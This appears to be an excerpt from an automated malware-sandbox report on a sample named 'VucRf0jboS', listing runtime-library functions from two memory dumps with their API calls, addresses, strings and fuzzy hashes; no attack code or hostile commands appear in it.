_free.LIBCMT ref: 00411FDA
_free.LIBCMT ref: 00411FF0
_free.LIBCMT ref: 00412001
_free.LIBCMT ref: 00412012
_free.LIBCMT ref: 00412029
GetCPInfo.KERNEL32(?,?), ref: 00412071

Part of subcall function 0041B14E: _free.LIBCMT ref: 0041B1B9

_free.LIBCMT ref: 0041221D
_free.LIBCMT ref: 00412230
_free.LIBCMT ref: 0041223E
_free.LIBCMT ref: 00412249
_free.LIBCMT ref: 0041228B
_free.LIBCMT ref: 00412293
_free.LIBCMT ref: 0041229B
_free.LIBCMT ref: 004122A3
_free.LIBCMT ref: 004122B1

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64

Uniqueness

Uniqueness Score: -1.00%

Function 041521D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04152241
_free.LIBCMT ref: 04152257
_free.LIBCMT ref: 04152268
_free.LIBCMT ref: 04152279
_free.LIBCMT ref: 04152290
GetCPInfo.KERNEL32(?,?), ref: 041522D8

Part of subcall function 0415B3B5: _free.LIBCMT ref: 0415B420

_free.LIBCMT ref: 04152484
_free.LIBCMT ref: 04152497
_free.LIBCMT ref: 041524A5
_free.LIBCMT ref: 041524B0
_free.LIBCMT ref: 041524F2
_free.LIBCMT ref: 041524FA
_free.LIBCMT ref: 04152502
_free.LIBCMT ref: 0415250A
_free.LIBCMT ref: 04152518

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction ID: f6731af5d4f6484c6480adb64b458d2d006507db6fc4216c50924c1d84cb4f09
Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction Fuzzy Hash: 79B19071900205DFEB21DFB9C8C0BEEB7F5BF08304F5440ADE9A9A7261DB75A8418B61

Uniqueness

Uniqueness Score: -1.00%

Function 0041F521 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041F565

Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9

_free.LIBCMT ref: 0041F55A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F57C
_free.LIBCMT ref: 0041F591
_free.LIBCMT ref: 0041F59C
_free.LIBCMT ref: 0041F5BE
_free.LIBCMT ref: 0041F5D1
_free.LIBCMT ref: 0041F5DF
_free.LIBCMT ref: 0041F5EA
_free.LIBCMT ref: 0041F622
_free.LIBCMT ref: 0041F629
_free.LIBCMT ref: 0041F646
_free.LIBCMT ref: 0041F65E

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18

Uniqueness

Uniqueness Score: -1.00%

Function 0415F788 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0415F7CC

Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB38
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB4A
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB5C
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB6E
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB80
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EB92
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBA4
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBB6
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBC8
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBDA
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBEC
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EBFE
Part of subcall function 0415EB1B: _free.LIBCMT ref: 0415EC10

_free.LIBCMT ref: 0415F7C1

Part of subcall function 04156501: HeapFree.KERNEL32(00000000,00000000,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?), ref: 04156517
Part of subcall function 04156501: GetLastError.KERNEL32(?,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?,?), ref: 04156529

_free.LIBCMT ref: 0415F7E3
_free.LIBCMT ref: 0415F7F8
_free.LIBCMT ref: 0415F803
_free.LIBCMT ref: 0415F825
_free.LIBCMT ref: 0415F838
_free.LIBCMT ref: 0415F846
_free.LIBCMT ref: 0415F851
_free.LIBCMT ref: 0415F889
_free.LIBCMT ref: 0415F890
_free.LIBCMT ref: 0415F8AD
_free.LIBCMT ref: 0415F8C5

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 948751188e9e5655c4e6b0d2d7a130a7e7c69956286fb93f8a52b04914159105
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: 31313B32690305DFEB30AA78D8C4BDA77E9EF00364F5444A9E879D6170DF32F9428A51

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9B2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E9FA
_free.LIBCMT ref: 0041EA1E
_free.LIBCMT ref: 0041EA2B
_free.LIBCMT ref: 0041EA50
_free.LIBCMT ref: 0041EA5D
_free.LIBCMT ref: 0041EA66
_free.LIBCMT ref: 0041ED44
_free.LIBCMT ref: 0041ED4C

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794

Uniqueness

Uniqueness Score: -1.00%

Function 00423226 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249

Strings

log10, xrefs: 00423293, 004232E3
/BB, xrefs: 0042342E
pow, xrefs: 0042332D, 004233D9, 004233EC
exp, xrefs: 0042330E, 00423370
asin, xrefs: 004233B5
acos, xrefs: 004233C1
sqrt, xrefs: 004233CD
log, xrefs: 004232EF, 004232FB

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: DecodePointer
String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-1021189420
Opcode ID: bdce98cfa96bad54e0b597383ae5f841ffe0f48aba0a72e5dd8a679a579e2192
Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
Opcode Fuzzy Hash: bdce98cfa96bad54e0b597383ae5f841ffe0f48aba0a72e5dd8a679a579e2192
Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D

Uniqueness

Uniqueness Score: -1.00%

Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416C39

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 00416C45
_free.LIBCMT ref: 00416C50
_free.LIBCMT ref: 00416C5B
_free.LIBCMT ref: 00416C66
_free.LIBCMT ref: 00416C71
_free.LIBCMT ref: 00416C7C
_free.LIBCMT ref: 00416C87
_free.LIBCMT ref: 00416C92
_free.LIBCMT ref: 00416CA0

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44

Uniqueness

Uniqueness Score: -1.00%

Function 04156E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04156EA0

Part of subcall function 04156501: HeapFree.KERNEL32(00000000,00000000,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?), ref: 04156517
Part of subcall function 04156501: GetLastError.KERNEL32(?,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?,?), ref: 04156529

_free.LIBCMT ref: 04156EAC
_free.LIBCMT ref: 04156EB7
_free.LIBCMT ref: 04156EC2
_free.LIBCMT ref: 04156ECD
_free.LIBCMT ref: 04156ED8
_free.LIBCMT ref: 04156EE3
_free.LIBCMT ref: 04156EEE
_free.LIBCMT ref: 04156EF9
_free.LIBCMT ref: 04156F07

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: 1ee6b961fe7425f7538cbeeb8e3061bf0475b2c88a243533e794e145697c6505
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: 9811A476160108EFEB11EF95C880CDD3BA5EF143A8B8144A5FE1C8B235DB32FA509B81

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004011B5
std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204

Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD

std::bad_exception::bad_exception.LIBCMT ref: 00401225
__CxxThrowException@8.LIBVCRUNTIME ref: 00401233
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7

Strings

bad locale name, xrefs: 0040121D

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 835844855-1405518554
Opcode ID: c10292f7589eabcfa51c9483d5f78d48ea4549d6174e0272d87768e1f32795f7
Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
Opcode Fuzzy Hash: c10292f7589eabcfa51c9483d5f78d48ea4549d6174e0272d87768e1f32795f7
Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 04141417 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0414141C
std::_Lockit::_Lockit.LIBCPMT ref: 0414142E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0414146B

Part of subcall function 041480E1: _Yarn.LIBCPMT ref: 04148100
Part of subcall function 041480E1: _Yarn.LIBCPMT ref: 04148124

std::bad_exception::bad_exception.LIBCMT ref: 0414148C
__CxxThrowException@8.LIBVCRUNTIME ref: 0414149A
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 041414BD
std::_Lockit::~_Lockit.LIBCPMT ref: 0414152E

Strings

n~B, xrefs: 04141417

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: n~B
API String ID: 835844855-2489732092
Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction ID: 26c84501a5a9e8cc25370679a1d17e5f5c07dd8ace38517aedbdc6ef49c763b2
Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction Fuzzy Hash: 81316F71804B40EFD731AF69D88065AFFF4FF88714B108A6FE09A92A50C774BA41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 04159514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction ID: 21eaa6420f9cc1fcfedeb97e5cb79ab2a309c22baf1b9bf3c4ccee9a6051f6b1
Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction Fuzzy Hash: EBC1B1B5A14249EFEB119FA8C8C0BEDBBB4AF09314F0840D5D965A73B1C734A941CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

_memcmp.LIBVCRUNTIME ref: 00414CF4
_free.LIBCMT ref: 00414D65
_free.LIBCMT ref: 00414D7E
_free.LIBCMT ref: 00414DB0
_free.LIBCMT ref: 00414DB9
_free.LIBCMT ref: 00414DC5

Strings

C, xrefs: 00414BB2

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48

Uniqueness

Uniqueness Score: -1.00%

Function 04154CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE

_memcmp.LIBVCRUNTIME ref: 04154F5B
_free.LIBCMT ref: 04154FCC
_free.LIBCMT ref: 04154FE5
_free.LIBCMT ref: 04155017
_free.LIBCMT ref: 04155020
_free.LIBCMT ref: 0415502C

Strings

C, xrefs: 04154E19

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction ID: 3c3cb6d4f9c764ab0347d34b9772c9c2e3cc351fae2f0bbb29b273fe70d9cd9b
Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction Fuzzy Hash: 82B12575A01219DBDB24DF18C884BEDB7B4FB48314F5045EAD959A7264E731BE90CF80

Uniqueness

Uniqueness Score: -1.00%

Function 004145CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

_free.LIBCMT ref: 004146D7
_free.LIBCMT ref: 004146EE
_free.LIBCMT ref: 0041470D
_free.LIBCMT ref: 00414728
_free.LIBCMT ref: 0041473F

Strings

B, xrefs: 0041461F
|B, xrefs: 004146B1

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: B$|B
API String ID: 3033488037-200315465
Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
__alloca_probe_16.LIBCMT ref: 004167D1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
__alloca_probe_16.LIBCMT ref: 004168B6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
__freea.LIBCMT ref: 00416926

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

__freea.LIBCMT ref: 0041692F
__freea.LIBCMT ref: 00416954

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD7 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE46
_free.LIBCMT ref: 0041EE54
_free.LIBCMT ref: 0041EF82
_free.LIBCMT ref: 0041EF8D

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98

Uniqueness

Uniqueness Score: -1.00%

Function 0415F03E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0415F0AD
_free.LIBCMT ref: 0415F0BB
_free.LIBCMT ref: 0415F1E9
_free.LIBCMT ref: 0415F1F4

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction ID: f46027c18b38fb15bdf5992ad4a39adfe2e29c1104746947a926303fbddba07e
Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction Fuzzy Hash: 7161B675944205EFEB20DFA4D8C1BDABBF5EF44720F1441AADD64EB260DB70B9428B90

Uniqueness

Uniqueness Score: -1.00%

Function 04154833 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04157CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04157CDE

_free.LIBCMT ref: 0415493E
_free.LIBCMT ref: 04154955
_free.LIBCMT ref: 04154974
_free.LIBCMT ref: 0415498F
_free.LIBCMT ref: 041549A6

Strings

B, xrefs: 04154886

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: B
API String ID: 3033488037-2386870291
Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction ID: 871a7b7021d6e8c3a2b93d804c038ba3cfd9cff0c6eed3daf44ff7fe688f04ad
Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction Fuzzy Hash: 2B51B171A00204EFEB24DF69D8C1BAA77F4EF49724B5445A9EC69DB260E731F941CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
__fassign.LIBCMT ref: 00415AD0
__fassign.LIBCMT ref: 00415AEB
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 04155C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,041563EF,?,?,?,?,?,?), ref: 04155CBC
__fassign.LIBCMT ref: 04155D37
__fassign.LIBCMT ref: 04155D52
